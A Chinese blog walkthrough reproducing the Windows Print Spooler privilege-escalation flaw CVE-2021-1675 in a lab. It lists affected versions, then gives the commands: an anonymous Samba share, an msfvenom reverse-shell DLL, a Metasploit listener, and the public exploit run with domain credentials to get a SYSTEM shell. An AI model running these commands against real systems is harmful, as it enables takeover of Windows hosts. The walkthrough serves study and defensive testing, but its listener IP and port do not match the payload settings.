CVE-2021-1675 Windows Print Spooler权限提升漏洞复现

这篇具有很好参考价值的文章主要介绍了CVE-2021-1675 Windows Print Spooler权限提升漏洞复现。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

漏洞概述

Microsoft Windows Print Spooler 服务未能限制对RpcAddPrinterDriverEx()函数的访问,该函数可能允许远程身份验证的攻击者以系统权限在易受攻击的系统上执行任意代码。该RpcAddPrinterDriverEx()函数用于在系统上安装打印机驱动程序。此函数的参数之一是DRIVER_CONTAINER对象,它包含有关添加的打印机将使用哪个驱动程序的信息。另一个参数,dwFileCopyFlags指定如何复制替换打印机驱动程序文件。攻击者可以利用任何经过身份验证的用户都可以调用RpcAddPrinterDriverEx()并指定位于远程服务器上的驱动程序文件这一事实。这会导致 Print Spooler 服务spoolsv.exe以 SYSTEM 权限执行任意 DLL 文件中的代码。

影响版本

Windows Server 2012 R2 (Server Core installation)

Windows Server 2012 R2

Windows Server 2012 (Server Core installation)

Windows Server 2012

Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)

Windows Server 2008 R2 for x64-based Systems Service Pack 1

Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)

Windows Server 2008 for x64-based Systems Service Pack 2

Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)

Windows Server 2008 for 32-bit Systems Service Pack 2

Windows RT 8.1

Windows 8.1 for x64-based systems

Windows 8.1 for 32-bit systems

Windows 7 for x64-based Systems Service Pack 1

Windows 7 for 32-bit Systems Service Pack 1

Windows Server 2016 (Server Core installation)

Windows Server 2016

Windows 10 Version 1607 for x64-based Systems

Windows 10 Version 1607 for 32-bit Systems

Windows 10 for x64-based Systems

Windows 10 for 32-bit Systems

Windows Server, version 20H2 (Server Core Installation)

Windows 10 Version 20H2 for ARM64-based Systems

Windows 10 Version 20H2 for 32-bit Systems

Windows 10 Version 20H2 for x64-based Systems

Windows Server, version 2004 (Server Core installation)

Windows 10 Version 2004 for x64-based Systems

Windows 10 Version 2004 for ARM64-based Systems

Windows 10 Version 2004 for 32-bit Systems

Windows 10 Version 21H1 for 32-bit Systems

Windows 10 Version 21H1 for ARM64-based Systems

Windows 10 Version 21H1 for x64-based Systems

Windows 10 Version 1909 for ARM64-based Systems

Windows 10 Version 1909 for x64-based Systems

Windows 10 Version 1909 for 32-bit Systems

Windows Server 2019 (Server Core installation)

Windows Server 2019

Windows 10 Version 1809 for ARM64-based Systems

Windows 10 Version 1809 for x64-based Systems

Windows 10 Version 1809 for 32-bit Systems

工具

Poc: GitHub - cube0x0/impacket: Impacket is a collection of Python classes for working with network protocols.

Exp: https://github.com/cube0x0/CVE-2021-1675

攻击机:kali2022

靶机:windows sever 2016

漏洞复现

(1)在域中创建一个新用户

CVE-2021-1675 Windows Print Spooler权限提升漏洞复现

 文章来源地址https://www.toymoban.com/news/detail-462195.html

(2)在命令行中输入 net user 查看用户是否添加成功

CVE-2021-1675 Windows Print Spooler权限提升漏洞复现

 

(3)net user wuhu 查看用户数据

CVE-2021-1675 Windows Print Spooler权限提升漏洞复现 

(4)打开Print Spooler服务

CVE-2021-1675 Windows Print Spooler权限提升漏洞复现

(5)使用kali运行poc

cd impacket

python3 ./setup.py install

CVE-2021-1675 Windows Print Spooler权限提升漏洞复现

 

(6)开启匿名访问SMB

Vim /etc/samba/smb.comf

在smb.conf末尾添加force user = nobody

(7)配置完后,开启SMBD 

service smbd start

CVE-2021-1675 Windows Print Spooler权限提升漏洞复现

 

(8)查看是否能够连接

CVE-2021-1675 Windows Print Spooler权限提升漏洞复现

 

9在共享目录tmp下通过msfvenom生成.dll文件木马

msfvenom -p windows/x64/shell_reverse_tcp lhost=192.168.10.2 lport=9999 -f dll -o reverse.dll

 LHOST 是Kali的IP  ,LPORT设置为9999 ,生成的反弹shell放在了TMP文件夹下

CVE-2021-1675 Windows Print Spooler权限提升漏洞复现 

(10)利用msfconsole开启监听

use exploit/multi/handler

set payload windows/x64/shell_reverse_tcp

set lhost 192.168.56.130    (kali的ip地址)

set lport 443        

CVE-2021-1675 Windows Print Spooler权限提升漏洞复现   

 

  1. 通过使用EXP进行利用

python3 CVE-2021-1675.py 用户名:密码@192.168.56.136 '\\192.168.56.130\smb\reverse.dll'

成功反弹shell并获取到域控system权限,利用成功

CVE-2021-1675 Windows Print Spooler权限提升漏洞复现

 

到了这里,关于CVE-2021-1675 Windows Print Spooler权限提升漏洞复现的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • CVE-2023-36874 Windows错误报告服务本地权限提升漏洞分析

    漏洞简介 Windows错误报告服务在提交错误报告前会创建 wermgr.exe 进程,而攻击者使用特殊手法欺骗系统创建伪造的wermgr.exe进程,从而以 system 权限执行代码。 影响版本 危害等级 7.8 ∣ H I G H textcolor{Red}{7.8 | HIGH} 7.8∣ H I G H 漏洞复现 首先在C盘下创建一个目录testsystem32,然后将

    2024年02月11日
    浏览(25)
  • 【权限提升】Linux Sudo权限提升漏洞(CVE-2023-22809)

    Sudo存在权限提升漏洞,攻击者可过特定的payload获取服务器 ROOT权限 sudo (su \\\" do\\\")允许系统管理员将权限委托给某些用户(或用户组),能够以ROOT用户或其他用户身份运行部分(或全部)命令。 sudo使用用户提供的环境变量让用户选择他们所选择的编辑器。的内容其中一个变量扩展了传

    2023年04月25日
    浏览(29)
  • Linux DirtyPipe权限提升漏洞 CVE-2022-0847

    CVE-2022-0847-DirtyPipe-Exploit CVE-2022-0847 是存在于 Linux内核 5.8 及之后版本中的本地提权漏洞。攻击者通过利用此漏洞,可覆盖重写任意可读文件中的数据,从而可将普通权限的用户提升到特权 root。 CVE-2022-0847 的漏洞原理类似于 CVE-2016-5195 脏牛漏洞(Dirty Cow),但它更容易被利用

    2024年02月09日
    浏览(25)
  • Linux Kernel 权限提升漏洞(CVE-2023-32233) 修复

    2023年5月5日,MITRE发布了Linux Kernel 权限提升漏洞(CVE-2023-32233):Linux Kernel 的 Netfilter nf_tables子系统存在释放后重用漏洞,在处理 Netfilter nf_tables 基本操作请求时,由于匿名集处理不当,导致可以任意读写内核内存,拥有低权限的本地攻击者可以利用该漏洞将权限提升至ROOT权限

    2024年02月07日
    浏览(30)
  • 操作系统权限提升(三)之Windows系统内核溢出漏洞提权

    系列文章 操作系统权限提升(一)之操作系统权限介绍 操作系统权限提升(二)之常见提权的环境介绍 注:阅读本编文章前,请先阅读系列文章,以免造成看不懂的情况!!! 溢出提权是指攻击者利用系统本身或系统中软件的漏洞来获取 Windows操作系统System权限,其中溢出,提权

    2024年02月14日
    浏览(26)
  • 解决print spooler打印服务自动停止的过程记录

    办公室一台电脑的共享打印机突然无法打印,提示打印服务已停止,打开服务发现print spooler服务已经停止,同时打印机列表中打印机记录也全部消失。右键启动服务,打印机列表出现,但是刷新后发现print spooler服务又已经停止。 根据网上的解决方法,有人认为是打印服务的

    2024年02月04日
    浏览(28)
  • CVE-2021–26855与CVE-2021–27065漏洞分析及复现

    文章首发先知社区:https://xz.aliyun.com/t/10098 微软在上半年三月披露了关于Exchange邮件服务器 CVE-2021–26855 (SSRF)与 CVE-2021–27065 (任意文件写入)的漏洞,这两个漏洞配合可以造成未授权的webshell写入,是非常严重的高危漏洞。漏洞刚出来那会儿并未注意,正好前两天4哥在群里发了个关

    2024年02月07日
    浏览(29)
  • CVE-2021-4034漏洞原理解析

    本篇文章主要叙述CVE-2021-4034漏洞,该漏洞影响的linux发行版众多,例如:Ubuntu、CentOS、Debian等等,该漏洞为Linux系统本地提权漏洞,利用脚本已经公开,利用简单且稳定,脚本地址:Github 当攻击者获取目标系统普通用户权限时,利用该脚本即可直接获得root权限,该漏洞的主要

    2023年04月12日
    浏览(31)
  • Weblogic漏洞 CVE-2021-2109 处理

    好记忆不如烂笔头,能记下点东西,就记下点,有时间拿出来看看,也会发觉不一样的感受. 目录 一、前言 二、影响版本 三、漏洞查阅 四、漏洞修复 4.1 补丁包下载  4.2 安装补丁包  4.3 具体操作 oracl 早就发布了weblogic的漏洞信息,但是因为各种原因没有及时处理(内网环境

    2024年02月04日
    浏览(33)
  • openssl升级解决CVE-2021-3711漏洞

    查看当前openssl版本 从官网下载最新版: https://www.openssl.org/source/ 开始备份+编译安装 备份 安装 开始替换 验证

    2024年02月11日
    浏览(33)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包